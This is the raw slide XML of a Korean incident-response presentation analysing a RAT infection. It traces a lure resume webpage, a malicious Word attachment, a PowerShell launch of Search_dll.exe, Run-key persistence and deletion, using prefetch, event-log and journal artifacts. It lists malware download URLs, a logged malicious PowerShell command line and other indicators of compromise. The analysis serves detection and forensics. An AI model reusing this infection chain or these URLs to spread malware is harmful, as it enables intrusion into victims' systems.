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76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8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5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8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3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0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7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7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3B0B-5375-4B6D-9611-A09606F0776D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3F40-DB51-4856-A13F-AC817679E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48986-07D6-4274-AABC-F8BB68D83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침해사고 분석</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211308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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 다운로드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5" y="2628253"/>
            <a:ext cx="52303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파일시스템 로그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$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UsnJrnl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:$J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D38B7-D320-4087-8506-BD175B6265A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951345" y="3165394"/>
            <a:ext cx="97261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파일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C:\Windows\Help\Windows\ContentStore\Search_dll.exe </a:t>
            </a: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시각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오후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:58:36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9B7289-505E-4E86-8B87-74D97ED7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19" y="4577678"/>
            <a:ext cx="9188462" cy="1062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53AA0-7441-4072-BABD-1B831C1F4B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4579335" y="5665895"/>
            <a:ext cx="2842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/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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300" b="1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UsnJrnl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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:$J – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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 파일 생성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
              <a:t>]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22366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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 다운로드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5" y="2628253"/>
            <a:ext cx="5230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악성코드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Search_dll.exe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Trojan.MSILZilla.6508</a:t>
            </a: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1963C5-55A4-4DA9-9A72-179523626F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5891343" y="3768725"/>
            <a:ext cx="5863920" cy="2724150"/>
            <a:chOff x="4382179" y="2628253"/>
            <a:chExt cx="7146302" cy="36398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F5D3D4E-80D3-4446-9C8E-C5C85F373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179" y="2628253"/>
              <a:ext cx="7146302" cy="33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F39F7-99A9-43EA-BAAD-A8590E551790}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7091153" y="5975688"/>
              <a:ext cx="17283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/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0" err="1"/>
                <a:t>VirusTotal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0"/>
                <a:t>검사 결과</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="13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A6B15F-12BB-45CB-9205-94D0ED8FDB0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1104663" y="3768725"/>
            <a:ext cx="4544580" cy="2793700"/>
            <a:chOff x="6664360" y="3020725"/>
            <a:chExt cx="4576295" cy="276333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B46BF92-E289-4FF1-B0AE-B8BD226B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4360" y="3020725"/>
              <a:ext cx="4576295" cy="2465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45E72C-406B-4AD6-BF85-03CA5DE24006}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7622976" y="5491669"/>
              <a:ext cx="2768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/>
                <a:t>[adwareremoval.info </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0"/>
                <a:t>웹페이지 참조</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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79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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 다운로드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4" y="2628253"/>
            <a:ext cx="9762837" cy="37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악성코드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Search_dll.exe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https://www.virustotal.com/gui/file/4176b95b8a3b60180c95981c8e06c7ca7a7e08efb8a32f6866b8cf25ceeccde7/behavior/Microsoft%20Sysinternals</a:t>
            </a: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15290" indent="-285750" algn="just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컴파일된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시간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2022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오후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3:45:57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5290" indent="-285750" algn="just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IP 1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10.10.10.35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5290" indent="-285750" algn="just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드랍하는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파일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%USERPROFILE%\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AppData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\Local\Temp\Search_dll.exe.exe.log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5290" indent="-285750" algn="just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레지스트리 키 변조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marL="12954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HKU\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\Server 	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레지스트리에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%SAMPLEPATH%\Search_dll.exe.exe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954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인젝트된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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="129540" indent="1270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\\?\C:\Windows\system32\wbem\WMIADAP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.EXE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87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2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 문서파일 다운로드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5" y="2488401"/>
            <a:ext cx="1022585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시각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오후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3:58:33</a:t>
            </a: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웹 히스토리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downloads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Daum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메일에 첨부된 압축파일을 다운로드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파일시스템 로그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- $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UsnJrnl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:$J</a:t>
            </a:r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3EDDA1-9B5D-4A72-A836-0A2D0A62594C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1332827" y="3947507"/>
            <a:ext cx="9526345" cy="1063699"/>
            <a:chOff x="1203620" y="4802942"/>
            <a:chExt cx="9784760" cy="109746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51EE80-D039-4C3B-95B9-964CEAA80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620" y="4802942"/>
              <a:ext cx="9784760" cy="748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39D11E-CA48-486C-BA04-C771DE9E5E12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2885739" y="5601977"/>
              <a:ext cx="6094206" cy="298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altLang="en-US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웹 히스토리 中 첨부파일 다운로드 로그</a:t>
              </a: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]</a:t>
              </a:r>
              <a:endPara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A7FE17-61AA-4886-AD63-110611874C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1332826" y="5702764"/>
            <a:ext cx="9526345" cy="941227"/>
            <a:chOff x="1332826" y="5702764"/>
            <a:chExt cx="9526345" cy="94122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5B6BE5-7FF0-4349-85F8-3FE4FDB7C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2826" y="5702764"/>
              <a:ext cx="9526345" cy="5953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BD214A-7A20-4F51-A834-1FE8807CC09E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2970521" y="6354745"/>
              <a:ext cx="5933258" cy="289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[$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1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UsnJrnl</a:t>
              </a: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:$J </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR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분석 </a:t>
              </a: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– </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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압축파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR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생성</a:t>
              </a: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]</a:t>
              </a:r>
              <a:endPara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90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2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 문서파일 실행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5" y="2488401"/>
            <a:ext cx="102258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시각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오후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11:48:39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파일시스템 로그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- $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UsnJrnl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:$J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압축파일 압축 해제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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419E4C-BFA0-4974-9B8D-B70E29C52F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1223260" y="4196561"/>
            <a:ext cx="9682019" cy="904086"/>
            <a:chOff x="1332826" y="5323482"/>
            <a:chExt cx="9682019" cy="9040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BD214A-7A20-4F51-A834-1FE8807CC09E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3097641" y="5947221"/>
              <a:ext cx="5933258" cy="280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[$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1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UsnJrnl</a:t>
              </a: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:$J </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR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분석 </a:t>
              </a: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– </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR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압축해제 후 문서파일 생성</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="13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]</a:t>
              </a:r>
              <a:endPara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F26FF35-0507-4B34-B230-1FDB01367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826" y="5323482"/>
              <a:ext cx="9682019" cy="5953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1591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2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 문서파일 실행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5" y="2488401"/>
            <a:ext cx="10225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프리패치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워드 실행 후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cmd.exe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powershell.exe,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conhost.exe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실행됨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endParaRPr lang="en-US" altLang="ko-KR" sz="15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conhost.exe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프리패치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파일은 해당 시간에 생성된 것을 파일시스템 로그를 통해 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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4E573A-4828-4052-9EDE-1ECA4284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70215"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2312377" y="4190154"/>
          <a:ext cx="7567246" cy="1986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5154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4222530127"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2530875">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2171818120"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2311217">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977300403"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="27663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파일명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생성 시간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95236"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="24891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WINWORD.EXE-E2A3F0BF.pf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2022-02-08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오후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 11:48:55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56270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="51146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CMD.EXE-2EB3E6E2.pf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2022-02-08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오후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11:49:40	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146"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="51146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POWERSHELL.EXE-E69E0788.pf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1976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2022-02-08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오후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11:49:40	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1976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29165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="24891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CONHOST.EXE-F98A1078.pf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1976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2022-02-08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오후 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11:49:42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1976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UsnJrnl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:$J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로그를 통해 확인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81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1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2.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 실행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98DDB-CC60-423E-AB36-BF2C2E92E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2413100"/>
            <a:ext cx="52303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시각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오후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11:49:41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이벤트 로그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Powershell.evtx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프리패치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4E4D43-9680-4F13-BE00-C774F3852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64099"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2439105" y="3469548"/>
          <a:ext cx="7482205" cy="1368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622">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4174606426"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6309583">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3407726343"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1952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TimeCreated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년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2</a:t>
                      </a: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8</a:t>
                      </a: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일 오후 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11:49:41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748"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1952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EventID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012349"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="935128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HostApplication=powershell.exe /c C:\Windows\Help\Windows\ContentStore\Search_dll.exe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316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97AC4A8-73B8-464A-B0CA-056209E7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80034"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2486812" y="5560032"/>
          <a:ext cx="7389823" cy="1024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9447">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4222530127"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2959532">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2171818120"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1440844">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977300403"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2023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파일명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생성 시간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95236"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43431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SEARCH_DLL.EXE-9A8871C9.pf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2022-02-08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오후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11:49:42	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56270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="374031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SEARCH_DLL.EXE-9A8871C9.pf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2022-02-09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오전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9:28:53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87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2.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 및 악성 문서파일 삭제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98DDB-CC60-423E-AB36-BF2C2E92E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2413100"/>
            <a:ext cx="86659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파일시스템 로그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- $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UsnJrnl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:$J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악성 문서파일 삭제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Mentor_Apply_Information.docx</a:t>
            </a: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시각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오후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11:50:41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악성코드 삭제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5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Search_dll.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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시각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오전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9:47:50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96290D-8295-435E-8FD3-D81F2FF1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21" y="3836338"/>
            <a:ext cx="9614005" cy="592221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F6EA33-C9CE-4367-809A-C796FE81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21" y="5681149"/>
            <a:ext cx="9614006" cy="58370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03AD4B-26D2-47AE-9C70-574BED21CFC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3132991" y="4491313"/>
            <a:ext cx="609746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[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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UsnJrnl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:$J </a:t>
            </a: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 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악성 문</a:t>
            </a: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서파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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en-US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DE7FF-A43E-40C4-9A7A-629BF76ADFA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047268" y="6311900"/>
            <a:ext cx="609746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[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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UsnJrnl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:$J </a:t>
            </a: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 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악성코드 삭제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6233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 외 공격시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보고서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>미반영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3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 문서파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: HWP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문서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98DDB-CC60-423E-AB36-BF2C2E92E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2376997"/>
            <a:ext cx="866599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961A79-9C2F-4177-9263-7C42CA57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08" y="2549370"/>
            <a:ext cx="6477000" cy="88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D1F883-5910-47D3-88CA-2F9F1E1D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08" y="3538850"/>
            <a:ext cx="1170477" cy="89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631543-65F9-4535-AD7A-07C3D8BC07B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695576" y="4555685"/>
            <a:ext cx="609746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sz="13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hwp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내부 모습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en-US" sz="1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62B165-E062-4FC8-BEB7-D0531FE3A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567" y="5360834"/>
            <a:ext cx="7743769" cy="819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A6A222-EB56-4FA0-B406-D3F9A91A2D62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2863419" y="6310676"/>
            <a:ext cx="609746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[Exp.bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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en-US" sz="13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7013A68-4D9E-472A-9C8E-206EEC40A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429" y="3736280"/>
            <a:ext cx="5171454" cy="498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183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 외 공격시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보고서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>미반영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3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성문서파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: HWP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문서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98DDB-CC60-423E-AB36-BF2C2E92E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2413100"/>
            <a:ext cx="866599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WinPatch.exe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파일 생성 및 실행과 관련된 로그 없음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파일시스템 로그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- $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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UsnJrnl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:$J</a:t>
            </a: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sz="15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프리패치</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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20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77" y="1490541"/>
            <a:ext cx="10515600" cy="3494698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단계별 상세 분석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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 그 외 공격시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보고서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>미반영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10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1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>피해 상황 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: RAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 감염 상태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A2F16-0B8D-4B5D-BFF2-8E88D0F4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628253"/>
            <a:ext cx="2978922" cy="40659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6C5478-41EC-4E73-8CB6-1008334FF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94" y="4061436"/>
            <a:ext cx="781050" cy="857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E5408E-585A-47B9-8DCE-C6ED8D9469DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951345" y="262825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원격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5525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1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>피해 상황 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: RAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 감염 상태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5408E-585A-47B9-8DCE-C6ED8D9469DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951345" y="2628253"/>
            <a:ext cx="5230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(2)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 실행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아티팩트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/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>- Trojan.MSILZilla.6508 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>악성코드 실행 흔적</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>       - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>자세한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>아티팩트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 분석은 후에 상세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A70A65-CCAD-4FB1-A977-04B3FCC050A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6096000" y="2871293"/>
            <a:ext cx="5013290" cy="3081831"/>
            <a:chOff x="6664360" y="3020725"/>
            <a:chExt cx="4576295" cy="27633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2BCED9D-B0D8-45A2-BCDD-24637D92F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4360" y="3020725"/>
              <a:ext cx="4576295" cy="2465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B8ADE4-E359-40DC-BA43-43E43C065D99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7622976" y="5491669"/>
              <a:ext cx="2768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/>
                <a:t>[adwareremoval.info </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0"/>
                <a:t>웹페이지 참조</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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6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1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 감염 과정 개요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B387BC-3C15-481B-A7A4-8882322C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76" y="2408556"/>
            <a:ext cx="7414848" cy="42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1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용된 악성코드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4" y="3571231"/>
            <a:ext cx="6639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악성 웹페이지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http://neotra.kro.kr:5080/resume/apply/register_page.html</a:t>
            </a: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87A6-F2CD-4C30-B63A-1ACA093A83BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="4473259"/>
            <a:ext cx="7278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악성코드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Search_dll.exe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http://neotra.kro.kr:5080/resume/apply/up_documents/Search_dll.exe</a:t>
            </a:r>
          </a:p>
          <a:p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5C0C3-9CCA-4EBA-B82A-DD0FF671860D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2689104"/>
            <a:ext cx="6639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악성코드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유포지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http://neotra.kro.kr:5080</a:t>
            </a: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60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2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 웹페이지 접속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5" y="2628253"/>
            <a:ext cx="52303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시각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오후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3:58:33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웹 히스토리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2A86A7-506D-4DB6-9737-D32DF3DB411C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="5050340"/>
            <a:ext cx="10344150" cy="1182869"/>
            <a:chOff x="1009650" y="3858700"/>
            <a:chExt cx="10344150" cy="11828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F39F7-99A9-43EA-BAAD-A8590E551790}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5386895" y="4822737"/>
              <a:ext cx="1418209" cy="218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/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0" err="1"/>
                <a:t>VirusTotal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0"/>
                <a:t>검사 결과</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1300" b="1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A7568A-5D0A-4802-AD8F-BAE0D716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650" y="3858700"/>
              <a:ext cx="10344150" cy="893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60B068-0029-4D84-98CE-9DF344F3F557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951345" y="3165394"/>
